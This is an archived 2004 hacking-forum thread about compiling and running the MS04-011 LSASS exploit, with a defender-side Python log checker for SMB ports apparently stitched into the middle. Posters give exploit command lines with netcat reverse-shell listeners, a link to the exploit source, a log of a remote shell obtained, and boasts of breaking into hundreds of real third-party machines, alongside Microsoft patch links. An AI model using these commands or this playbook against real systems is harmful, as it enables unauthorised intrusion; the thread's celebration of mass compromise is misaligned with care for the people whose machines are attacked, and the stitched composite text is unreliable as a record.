WeeDMoNKeY
QUOTE (tweakz20 @ Apr 26 2004, 02:14 AM)
QUOTE (ssj4conejo @ Apr 26 2004, 01:27 AM)
... Only prob with this is finding ISPs that AREN'T blocking port 139... heh, trying to find some right now, or maybe schools, etc.

forgot to mention... ISPs aren't the people that control your ports, it's the administrator (of the local network/stand-alone system) who watches out for the ports... and schools.... not a very smart place to hit... most schools don't allow access to NetBIOS externally anyway

uhhhhhhh, yes it is the ISP, internet service providers, it's possible for them to DISABLE or block a certain port, hence preventing it from being used... mine doesn't because it would violate its agreement of all ports open... but lots block or close the port...
Alexander01
I am going to try to compile it, but I don't think it will work

I will post my errors / results here.. going to use lcc-win32
zombie
great work!
do I have to have NetBIOS enabled locally to get it working?
tried the scanner and some vulnerable IPs but no shell.
Alexander01
I cannot compile it, it says successful and I get a 10kb exe file that says "sploit usage:" and further nothing.. damn I never have luck with these things, this is the 7th time I try to compile an exploit and I always failed, this shit is really hard, u really need to be a programmer to do this

[edit]

second try now, i get this errors:

Wedit output window build: Mon Apr 26 20:30:26 2004
Warning ms04011lsass.c: 96 missing prototype for printf
Warning ms04011lsass.c: 108 missing prototype for sprintf
Warning ms04011lsass.c: 120 missing prototype for printf
Warning ms04011lsass.c: 127 missing prototype for printf
Error ms04011lsass.c: 131 the left hand side of the assignment can't be assigned to
Warning ms04011lsass.c: 134 missing prototype for printf
Warning ms04011lsass.c: 145 missing prototype for htons
Warning ms04011lsass.c: 146 missing prototype for inet_addr
Warning ms04011lsass.c: 156 missing prototype for htons
Warning ms04011lsass.c: 174 missing prototype for printf
Error ms04011lsass.c: 198 type error in argument 1 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 198 type error in argument 2 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 198 type error in argument 3 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 198 type error in argument 4 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 198 type error in argument 5 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 198 type error in argument 6 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 199 type error in argument 7 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 199 type error in argument 8 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 199 type error in argument 9 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 199 type error in argument 10 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 199 type error in argument 11 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Error ms04011lsass.c: 199 type error in argument 12 to `DsRoleUpgradeDownlevelServer'; found 'pointer to char' expected 'unsigned long'
Compilation + link time:0.4 sec, Return code: 1

I'll give up dude
Alexander01
someone else compile it please with the good sbaanetapi.dll
Erra
damn that could be a nice one... I will test it here got a couple machines that could work..... thanks

This one rebooted my test machine... no shell
Alexander01
Because u used the version with the incorrect dll (NetAPI32.dll)

it needs to be recompiled with the sbaanetapi.dll from http://www.k-otik.com/exploits/04252004.ms04011lsass.c.php


if someone can do this it would be too nice
I can't wait to test this one... seems to be very good, but no one posted the proper compiled version here, that's too bad guys
hulk
the one at the beginning of this thread is compiled with the right dll in the code
Alexander01
damn ur right, it can use it as external dll, damn all that shit for nothing..
Erra
I downloaded the one at the beginning of the post....and the dll

maybe it's cause the machine I'm testing it on is WinXP EN SP1
Alexander01
exploit works, I have successfully exploited a box in my country :D

and it has a nice speed too for the 1st one: Transferred 1 file totaling 13,30 MB in 3,97 (4.790,35 KBps)

patching it right away.......


woei got another 100mbit in my country.. fxping the hotfix right away
Transferred: Windows2000-KB835732-x86-ENU.EXE 6,83 MB in 0,83 (6.992,99 KBps)

and another one :D

Transferred 1 file totaling 13,30 MB in 1,98 (10.136,73 KBps)
blackP0ster
hm..it's really strange.

scanned about 50 vulnerable hosts with the scanner.. but cannot connect to any :(

never got my shell back

CODE

D:\>lsass 0 212.61.24.27 5553 213.54.167.110
shellcode size 316
Ret value = 1352
D:\


where's the problem??
cracken
Alexander01
what os version (type lang etc) you hacked with that one.?

cya
Alexander01
all Dutch till now.. and I'm hacking from a 2k server terminal english


[edit]

sorry i mean, located in holland but all have an english 2k server running
Flowby
can somebody provide a direct link to the patch?
hulk
I scanned port 139 and then put it through the DSS scanner and used the exploit on what the scanner says is vulnerable, and I always get this:

CODE

C:\>lsass 0 66.*.*.* 666 128.*.*.*
Create NULL session failed
shellcode size 316
Ret value = 53


:(
SuperG
that's probably because of firewall.

It works great for me, I gain lots of shells but only when exploiting from the LAN itself ...
thatsmej
The strange thing is, I tested with a customer. Ran nc on my workstation and ran the sploit remotely. Used a vuln IP in his network (not the box I was on) but the shell I got is the shell from the box you execute the program on.
Stephen79
OK, have tested this out, and although the exploit executes, it doesn't appear to create a shell for me.

here is what I tried:

DSScan.exe to target vuln IPs on my LAN (all Windows 2K SP2)

nc -l -v -p 1234
Listening on [any] 1234 ...


lsass.zip (Original with sbaanetapi.dll)


D:\> lsass 0 172.16.*.* 1234 172.16.*.*
shellcode size 316
Ret value = 1726

Gives the System 60 Second shutdown on the target machine.



nc -l -v -p 1234
Listening on [any] 1234 ...


lsass_fixed.zip (with sbaanetapi.dll)


D:\> lsass 0 172.16.*.* 1234 172.16.*.*
shellcode size 316
Ret value = 1726

Gives the System 60 Second shut down on MY machine.
Erra
Well, all I seem to get is this fulla that a few others are getting... I admit, I have only tried two IPs so far though

Create NULL session failed
shellcode size 316
Ret value = 53
Stephen79
Also tested it on an XP Pro SP1 laptop connected to the LAN. Also ONLY gives the 60 sec countdown.

anyway, here are all the patches:

Microsoft Windows 2000 Advanced Server SP4:

Microsoft Patch Security Update for Windows 2000 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows 2000 Advanced Server SP3:
Microsoft Patch Security Update for Windows 2000 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows 2000 Advanced Server SP2:
Microsoft Patch Security Update for Windows 2000 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows 2000 Advanced Server SP1:
Microsoft Windows 2000 Advanced Server :
Microsoft Windows 2000 Datacenter Server SP4:
Microsoft Windows 2000 Datacenter Server SP3:
Microsoft Windows 2000 Datacenter Server SP2:
Microsoft Windows 2000 Datacenter Server SP1:
Microsoft Windows 2000 Datacenter Server :
Microsoft Windows 2000 Professional SP4:
Microsoft Patch Security Update for Windows 2000 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows 2000 Professional SP3:
Microsoft Patch Security Update for Windows 2000 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows 2000 Professional SP2:
Microsoft Patch Security Update for Windows 2000 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows 2000 Professional SP1:
Microsoft Windows 2000 Professional :
Microsoft Windows 2000 Server SP4:
Microsoft Patch Security Update for Windows 2000 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows 2000 Server SP3:
Microsoft Patch Security Update for Windows 2000 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows 2000 Server SP2:
Microsoft Patch Security Update for Windows 2000 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows 2000 Server SP1:
Microsoft Windows 2000 Server :
Microsoft Windows Server 2003 Datacenter Edition :
Microsoft Windows Server 2003 Datacenter Edition 64-bit :
Microsoft Windows Server 2003 Enterprise Edition :
Microsoft Patch Security Update for Windows Server 2003 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows Server 2003 Enterprise Edition 64-bit :
Microsoft Patch Security Update for Windows Server 2003 64 Bit Edition and Windows XP 64 Bit Edition Version 2003 (
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows Server 2003 Standard Edition :
Microsoft Patch Security Update for Windows Server 2003 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows Server 2003 Web Edition :
Microsoft Patch Security Update for Windows Server 2003 (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows XP 64-bit Edition SP1:
Microsoft Patch Security Update for Windows XP 64 Bit Edition (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows XP 64-bit Edition :
Microsoft Windows XP 64-bit Edition Version 2003 SP1:
Microsoft Patch Security Update for Windows Server 2003 64 Bit Edition and Windows XP 64 Bit Edition Version 2003 (
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows XP 64-bit Edition Version 2003 :
Microsoft Patch Security Update for Windows Server 2003 64 Bit Edition and Windows XP 64 Bit Edition Version 2003 (
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows XP Home SP1:
Microsoft Patch Security Update for Windows XP (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows XP Home :
Microsoft Patch Security Update for Windows XP (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows XP Professional SP1:
Microsoft Patch Security Update for Windows XP (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows XP Professional :
Microsoft Patch Security Update for Windows XP (KB835732)
http://www.microsoft.com/downloads/details...&displaylang=en
References
Source: Microsoft Security Bulletin MS04-011
URL: http://www.microsoft.com/technet/security/...n/ms04-011.mspx

Source: Windows Local Security Authority Service Remote Buffer Overflow
URL: http://www.eeye.com/html/Research/Advisori...D20040413C.html

tte
what port this shit works on?
Killaloop
QUOTE (tte @ Apr 26 2004, 10:46 AM)
what port this shit works on?

why not ask what port to scan for? scriptkid.

don't mess around with that exploit... it restarts more machines than any other exploit. On XP machines it kills the RPC server and restarts the machine.
tweakz20
netcat listens on whatever port you tell it to... (and I'm pretty sure it uses 135 for the exploit.. netbios)
nc -l -p [port number]
morbido
Alexander01
does it really work???

post the results here so everyone can see
night^man
C:\JAMES>lsass 0 2.2.2.2 112 1.1.1.1
shellcode size 316
Ret value = 1727

C:\JAMES>nc.exe -vlp 112
listening on [any] 112 ...
connect to [1.1.1.1] from crap.fr [2.2.2.2] 1479
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>echo IT'S WORK ON .FR B0XES TOO [WIN2K]
echo IT'S WORK ON .FR B0XES TOO [WIN2K]
IT'S WORK ON .FR B0XES TOO [WIN2K]

C:\WINNT\system32>

brOmstar
read the source --- 139 + 445 are the doors to the window(s) ;)
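Ports 139 and 445 are what the thread keeps coming back to. As an added defender-side example that is not part of the thread, this Python checker runs over constructed firewall log lines (the line format and the addresses are made up for the example) and flags accepted inbound connections to 135/139/445 from addresses outside the RFC 1918 ranges, plus any source that touched several internal hosts, which is the pattern a port scanner leaves behind.

```python
import re
import ipaddress

# Constructed sample lines (not from the thread) in a simplified perimeter
# firewall format: "<date> <time> <ACTION> TCP <src>:<sport> -> <dst>:<dport>".
# External sources use documentation ranges; 192.168.1.x stands in for the LAN.
SAMPLE_LOG = """\
2004-04-26 20:30:26 ACCEPT TCP 198.51.100.7:1479 -> 192.168.1.10:445
2004-04-26 20:30:27 ACCEPT TCP 198.51.100.7:1480 -> 192.168.1.11:445
2004-04-26 20:30:28 ACCEPT TCP 198.51.100.7:1481 -> 192.168.1.12:139
2004-04-26 20:30:29 ACCEPT TCP 192.168.1.20:3045 -> 192.168.1.5:445
2004-04-26 20:30:30 DROP   TCP 203.0.113.9:2222 -> 192.168.1.10:139
2004-04-26 20:30:31 ACCEPT TCP 198.51.100.7:1482 -> 192.168.1.13:80
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+)\s+(?P<action>ACCEPT|DROP)\s+TCP\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)
# Ports named in the thread: 139 and 445 (the SMB entry points) plus 135.
WATCH_PORTS = {135, 139, 445}
# RFC 1918 listed explicitly: ipaddress.is_private would also treat the
# documentation ranges above as private, which would hide the hits.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_internal(addr):
    return any(ipaddress.ip_address(addr) in net for net in INTERNAL_NETS)

def parse_line(line):
    """Return a dict for one log line, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["sport"], rec["dport"] = int(rec["sport"]), int(rec["dport"])
    return rec

def external_smb_accepts(log_text):
    """Accepted connections to a watched port from a non-RFC1918 source."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if (rec and rec["action"] == "ACCEPT"
                and rec["dport"] in WATCH_PORTS and not is_internal(rec["src"])):
            hits.append(rec)
    return hits

def scanning_sources(hits, min_hosts=3):
    """External sources that reached at least min_hosts distinct internal hosts."""
    seen = {}
    for h in hits:
        seen.setdefault(h["src"], set()).add(h["dst"])
    return sorted(src for src, dsts in seen.items() if len(dsts) >= min_hosts)
```

On the sample above only the three connections from 198.51.100.7 to 139/445 are reported, and that address is the one listed as a likely scanner; the dropped packet and the internal-to-internal connection are ignored.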
flashlord
very nice, thank you
totof
I tested at home WinXP version 2002 service pack 1
Windows XP [version 5.1.2600]
lssas.exe 127.0.0.1 1 996 127.0.0.1 (port open at home 445, only)
it doesn't work
cracken
I hacked now over 400 boxes with a little bit modded version of this sploit:X
.us .at .cz .ch .se .de .uk roxx

100 scan results = ~80 shells;)

cya
TRi
Shell never works for me on XP but on 2000 it's working real fine. Thanks for all the info :)

Btw are you guys scanning on 139 or 445?
tazthedev
cracken how did you make this possible? I already found many many shells with sql, dameware, the other rpc vulns, iis but that one... I can't find anything... maybe you can give me just one IP that you know is working, just for testing that vuln? give it to me in private msg.


thx
brOmstar
I have the same results as cracken, this exploit is real dangerous ..
-=[MePhIsTo]=-
How could this be
80 shells from 100 scans. I use this scanner from foundstone.com but don't get any shell.
I have Windows XP, maybe that's the reason?
totof
woaw 8 shells, then I want to test this exploit seriously (100 mb line 5 mb line)
Uli
Thanks for the toolz
cracken
I'm hacking from a windows2000server via remote~ not from my own pc:X
and this exploit is total ownitsch
got 20 tiscalia.ch servers, 2 of them have 720 gb space that roxx oO

cya
-=[MePhIsTo]=-
do you use an autohacker?!?
can you please describe which exploit you use and which other files ;)

thx
Fantafour
QUOTE (cracken @ Apr 26 2004, 06:35 PM)
I'm hacking from a windows2000server via remote~ not from my own pc:X
and this exploit is total ownitsch
got 20 tiscalia.ch servers, 2 of them have 720 gb space that roxx oO

cya

haha ... I don't think so
it's all shit what you're kidding here, post results you biatch

I don't trust you, give it up

post your "edited" file, or post what you edited.
flashlord
hm, what did I do wrong?
I'm using w2k sp4. I'll try this on xp


+----------------------------------------------------+
| lsass Auto Hacker |
| Coded by $79 |
+----------------------------------------------------+

Please Select OS [0=W2k 1=XP]
0
Enter Your IP:
x.x.x.x
Port NetCat is Listening on:
123
Starting NetCat:
Create NULL session failed
shellcode size 316
Ret value = 53
Create NULL session failed
shellcode size 316
Ret value = 53
Create NULL session failed
shellcode size 316
Ret value = 53
shellcode size 316
Ret value = 1727
shellcode size 316
Ret value = 1394
Create NULL session failed
shellcode size 316
Ret value = 51
Create NULL session failed
shellcode size 316
Ret value = 53
Create NULL session failed
shellcode size 316
Ret value = 1326
Create NULL session failed
shellcode size 316
Ret value = 53
shellcode size 316
....
cracken
I give a (filtered) about what you think man..
btw the autohaxxor suxx^^ only n00bs use autohaxxors
Fantafour I won't post IPs here, I'm not crazy nub

cya
flashlord
h3h3 yes.
But for big scans autohaxors are very useful.

x1`
can someone define which port it is
139 , 445 , or 135?
thanks
Fantafour
QUOTE (Dickybob20 @ Apr 26 2004, 07:02 PM)
can someone define which port it is
139 , 445 , or 135?
thanks

I don't think so script kiddie


@ cracken, I don't want you to post IPs here (I had it?)
I only want to know what exactly you changed!
binary_hashes
HEY GUYZ WHAT'S UP, ANY HOPE FOR THE PERFECT MS04-011 exploit against XP and 2000, or should we forget this dream? Admins plz guide all of us in making this exploit successful
Stephen79
QUOTE (Dickybob20 @ Apr 26 2004, 08:02 PM)
can someone define which port it is
139 , 445 , or 135?
thanks

just use DSScan mate. It's better than checking the ports with sfind:

http://www.governmentsecurity.org/forum/in...opic=8069&st=15
cracken
@Fantafour maybe I'll PM you the new src but I won't post it here, too many script kiddies here, don't like to lose good ranges to script kiddies^^
QuadMedic
QUOTE (flashlord @ Apr 26 2004, 06:56 PM)
hm, what did I do wrong?
I'm using w2k sp4. I'll try this on xp


+----------------------------------------------------+
| lsass Auto Hacker |
| Coded by $79 |
+----------------------------------------------------+

Please Select OS [0=W2k 1=XP]
0
Enter Your IP:
x.x.x.x
Port NetCat is Listening on:
123
Starting NetCat:
Create NULL session failed
shellcode size 316
Ret value = 53
Create NULL session failed
shellcode size 316
Ret value = 53
Create NULL session failed
shellcode size 316
Ret value = 53
shellcode size 316
Ret value = 1727
shellcode size 316
Ret value = 1394
Create NULL session failed
shellcode size 316
Ret value = 51
Create NULL session failed
shellcode size 316
Ret value = 53
Create NULL session failed
shellcode size 316
Ret value = 1326
Create NULL session failed
shellcode size 316
Ret value = 53
shellcode size 316
....

m8 I get the same thing...........sux a bit
DarkAngel52457
I scan a big range with scan.exe on port 139 and I have many results, then check the IPs with dsscan and now all IPs are not vuln, I found no vuln IPs

Is what I did right or wrong?


Sorry for bad English
clems[
Can you help me: I tested on win2k server

C:\>lsass.exe 0 1.1.1.1 112 2.2.2.2
shellcode size 316
Ret value = 1727

C:\>nc -l -v -p 112
listening on [any] 112 ...

Waiting but :(